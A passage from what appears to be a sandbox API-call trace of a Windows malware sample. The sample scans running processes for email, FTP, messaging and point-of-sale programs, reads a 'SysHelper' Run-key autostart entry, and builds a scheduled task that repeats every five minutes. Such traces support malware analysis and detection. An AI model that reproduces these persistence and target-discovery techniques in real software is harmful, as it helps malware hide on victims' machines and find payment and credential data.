cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.434] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0104.434] CloseHandle (hObject=0x5a8) returned 1 [0104.434] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x5a8 [0104.435] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.436] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x8c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0104.436] CloseHandle (hObject=0x5a8) returned 1 [0104.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x5a8 [0104.436] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.437] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xbd0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0104.438] CloseHandle (hObject=0x5a8) returned 1 [0104.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5a8 [0104.438] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.439] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xb00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0104.439] CloseHandle (hObject=0x5a8) returned 1 [0104.439] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5a8 [0104.440] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.441] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1280000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0104.441] CloseHandle (hObject=0x5a8) returned 1 [0104.441] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5a8 [0104.441] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.442] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1160000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0104.443] CloseHandle (hObject=0x5a8) returned 1 [0104.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5a8 [0104.443] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.444] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x330000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0104.444] CloseHandle (hObject=0x5a8) returned 1 [0104.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5a8 [0104.444] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.446] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0104.446] CloseHandle (hObject=0x5a8) returned 1 [0104.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5a8 [0104.446] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.447] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1220000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0104.448] CloseHandle (hObject=0x5a8) returned 1 [0104.448] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5a8 [0104.448] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.451] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x310000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0104.451] CloseHandle (hObject=0x5a8) returned 1 [0104.451] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5a8 [0104.451] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.453] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x170000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0104.453] CloseHandle (hObject=0x5a8) returned 1 [0104.453] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5a8 [0104.453] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.454] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11a0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0104.455] CloseHandle (hObject=0x5a8) returned 1 [0104.455] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5a8 [0104.455] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.456] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xfc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0104.456] CloseHandle (hObject=0x5a8) returned 1 [0104.456] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5a8 [0104.456] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.458] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x820000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0104.458] CloseHandle (hObject=0x5a8) returned 1 [0104.458] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5a8 [0104.458] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.459] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x13b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0104.460] CloseHandle (hObject=0x5a8) returned 1 [0104.460] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5a8 [0104.460] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.461] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x190000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0104.461] CloseHandle (hObject=0x5a8) returned 1 [0104.461] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5a8 [0104.461] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.463] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x320000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0104.463] CloseHandle (hObject=0x5a8) returned 1 [0104.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5a8 [0104.463] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.464] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xd40000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0104.465] CloseHandle (hObject=0x5a8) returned 1 [0104.465] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5a8 [0104.465] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.466] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x880000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0104.466] CloseHandle (hObject=0x5a8) returned 1 [0104.466] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5a8 [0104.466] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.468] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x3a0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0104.468] CloseHandle (hObject=0x5a8) returned 1 [0104.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5a8 [0104.468] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.469] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0104.470] CloseHandle (hObject=0x5a8) returned 1 [0104.470] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5a8 [0104.470] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.471] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xa90000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0104.471] CloseHandle (hObject=0x5a8) returned 1 [0104.471] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5a8 [0104.471] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.473] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x960000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0104.473] CloseHandle (hObject=0x5a8) returned 1 [0104.473] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5a8 [0104.473] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.474] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x310000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0104.475] CloseHandle (hObject=0x5a8) returned 1 [0104.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5a8 [0104.475] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.476] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0xca0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0104.476] CloseHandle (hObject=0x5a8) returned 1 [0104.476] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5a8 [0104.476] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.478] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x3d0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0104.478] CloseHandle (hObject=0x5a8) returned 1 [0104.478] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x5a8 [0104.478] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.479] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x1070000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0104.479] CloseHandle (hObject=0x5a8) returned 1 [0104.480] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5a8 [0104.480] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.481] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x140000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0104.481] CloseHandle (hObject=0x5a8) returned 1 [0104.481] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5a8 [0104.481] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.483] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x980000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="meta_failures.exe") returned 0x11 [0104.483] CloseHandle (hObject=0x5a8) returned 1 [0104.483] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x5a8 [0104.483] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.484] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x11c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="complement.exe") returned 0xe [0104.485] CloseHandle (hObject=0x5a8) returned 1 [0104.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0104.485] CloseHandle (hObject=0x0) returned 0 [0104.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa10) returned 0x0 [0104.485] CloseHandle (hObject=0x0) returned 0 [0104.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb10) returned 0x0 [0104.485] CloseHandle (hObject=0x0) returned 0 [0104.485] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x5a8 [0104.485] EnumProcessModules (in: hProcess=0x5a8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0104.487] GetModuleBaseNameW (in: hProcess=0x5a8, hModule=0x400000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="h1rxxmJek7fnkHTT.exe") returned 0x14 [0104.487] CloseHandle (hObject=0x5a8) returned 1 [0104.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x0 [0104.487] CloseHandle (hObject=0x0) returned 0 [0104.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x0 [0104.487] CloseHandle (hObject=0x0) returned 0 [0104.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x0 [0104.487] CloseHandle (hObject=0x0) returned 0 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x759ce8 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3327460 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x333a4d0 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x333a738 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x333a9a0 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x333ac08 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3330050 [0104.497] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33302b8 [0104.498] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3330520 [0104.498] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3330788 [0104.498] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33309f0 [0104.507] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d298 | out: phkResult=0x18d298*=0x5a8) returned 0x0 [0104.507] RegQueryValueExW (in: hKey=0x5a8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d294, lpData=0x18b9c0, lpcbData=0x18d278*=0x400 | out: lpType=0x18d294*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", lpcbData=0x18d278*=0xe8) returned 0x0 [0104.507] RegCloseKey (hKey=0x5a8) returned 0x0 [0104.507] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xf0) returned 0x761980 [0104.507] lstrlenA (lpString="\" --AutoStart") returned 13 [0104.507] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f50f8 [0104.507] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x761980 | out: hHeap=0x730000) returned 1 [0104.507] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 1 [0104.507] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f51d0 [0104.507] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f50f8 | out: hHeap=0x730000) returned 1 [0104.508] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f50f8 [0104.508] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f52a8 [0104.508] CoInitialize (pvReserved=0x0) returned 0x0 [0104.546] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0104.546] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f5530 [0104.547] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d284 | out: ppv=0x18d284*=0x29008b8) returned 0x0 [0104.555] TaskScheduler:ITaskService:Connect (This=0x29008b8, serverName=0x18cd10*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18cd20*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18cd30*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18cd40*(varType=0x0, wReserved1=0x333, wReserved2=0xd22c, wReserved3=0x18, varVal1=0x420cab, varVal2=0x730000)) returned 0x0 [0104.562] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339010 [0104.562] TaskScheduler:ITaskService:GetFolder (in: This=0x29008b8, Path="\\", ppFolder=0x18d28c | out: ppFolder=0x18d28c*=0x2900920) returned 0x0 [0104.568] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339010 | out: hHeap=0x730000) returned 1 [0104.568] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339010 [0104.568] ITaskFolder:DeleteTask (This=0x2900920, Name="Time Trigger Task", flags=0) returned 0x0 [0104.634] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339010 | out: hHeap=0x730000) returned 1 [0104.634] TaskScheduler:ITaskService:NewTask (in: This=0x29008b8, flags=0x0, ppDefinition=0x18d290 | out: ppDefinition=0x18d290*=0x2900950) returned 0x0 [0104.635] TaskScheduler:IUnknown:Release (This=0x29008b8) returned 0x1 [0104.635] ITaskDefinition:get_RegistrationInfo (in: This=0x2900950, ppRegistrationInfo=0x18d264 | out: ppRegistrationInfo=0x18d264*=0x2900a10) returned 0x0 [0104.635] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.635] IRegistrationInfo:put_Author (This=0x2900a10, Author="Author Name") returned 0x0 [0104.635] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.635] IUnknown:Release (This=0x2900a10) returned 0x1 [0104.635] ITaskDefinition:get_Principal (in: This=0x2900950, ppPrincipal=0x18d26c | out: ppPrincipal=0x18d26c*=0x2900ba0) returned 0x0 [0104.635] IPrincipal:put_LogonType (This=0x2900ba0, LogonType=3) returned 0x0 [0104.635] IUnknown:Release (This=0x2900ba0) returned 0x1 [0104.635] ITaskDefinition:get_Settings (in: This=0x2900950, ppSettings=0x18d274 | out: ppSettings=0x18d274*=0x2900ac0) returned 0x0 [0104.636] ITaskSettings:put_StartWhenAvailable (This=0x2900ac0, StartWhenAvailable=1) returned 0x0 [0104.636] IUnknown:Release (This=0x2900ac0) returned 0x1 [0104.636] ITaskSettings:get_IdleSettings (in: This=0x2900ac0, ppIdleSettings=0x18d258 | out: ppIdleSettings=0x18d258*=0x2900b30) returned 0x0 [0104.636] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.636] IIdleSettings:put_WaitTimeout (This=0x2900b30, WaitTimeout="PT5M") returned 0x0 [0104.636] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.636] IUnknown:Release (This=0x2900b30) returned 0x1 [0104.637] ITaskDefinition:get_Triggers (in: This=0x2900950, ppTriggers=0x18d254 | out: ppTriggers=0x18d254*=0x2900a80) returned 0x0 [0104.637] ITriggerCollection:Create (in: This=0x2900a80, Type=1, ppTrigger=0x18d260 | out: ppTrigger=0x18d260*=0x2900c00) returned 0x0 [0104.637] IUnknown:Release (This=0x2900a80) returned 0x1 [0104.637] IUnknown:QueryInterface (in: This=0x2900c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d27c | out: ppvObject=0x18d27c*=0x2900c00) returned 0x0 [0104.637] IUnknown:Release (This=0x2900c00) returned 0x2 [0104.637] ITrigger:get_Repetition (in: This=0x2900c00, ppRepeat=0x18d268 | out: ppRepeat=0x18d268*=0x2900c50) returned 0x0 [0104.637] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.637] IRepetitionPattern:put_Interval (This=0x2900c50, Interval="PT5M") returned 0x0 [0104.637] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.637] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.638] IRepetitionPattern:put_Duration (This=0x2900c50, Duration="") returned 0x0 [0104.638] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.638] ITrigger:put_Repetition (This=0x2900c00, Repetition=0x2900c50) returned 0x0 [0104.638] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.638] ITrigger:put_Id (This=0x2900c00, Id="Trigger1") returned 0x0 [0104.638] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.638] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.638] ITrigger:put_EndBoundary (This=0x2900c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0104.638] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18cd3c | out: lpSystemTimeAsFileTime=0x18cd3c*(dwLowDateTime=0x1c10f100, dwHighDateTime=0x1d5fd35)) [0104.647] GetLastError () returned 0x0 [0104.647] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cca4 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18cca4) returned 26 [0104.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cca4 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18cca4) returned 26 [0104.649] GetLastError () returned 0x0 [0104.649] ITrigger:put_StartBoundary (This=0x2900c00, StartBoundary="2020-03-19T01:56:22") returned 0x0 [0104.649] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.650] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3333008 | out: hHeap=0x730000) returned 1 [0104.650] IUnknown:Release (This=0x2900c00) returned 0x1 [0104.650] ITaskDefinition:get_Actions (in: This=0x2900950, ppActions=0x18d270 | out: ppActions=0x18d270*=0x29009c8) returned 0x0 [0104.650] IActionCollection:Create (in: This=0x29009c8, Type=0, ppAction=0x18d25c | out: ppAction=0x18d25c*=0x2900c98) returned 0x0 [0104.650] IUnknown:Release (This=0x29009c8) returned 0x1 [0104.650] IUnknown:QueryInterface (in: This=0x2900c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d278 | out: ppvObject=0x18d278*=0x2900c98) returned 0x0 [0104.650] IUnknown:Release (This=0x2900c98) returned 0x2 [0104.650] RtlAllocateHeap (HeapHandle=0x730000, 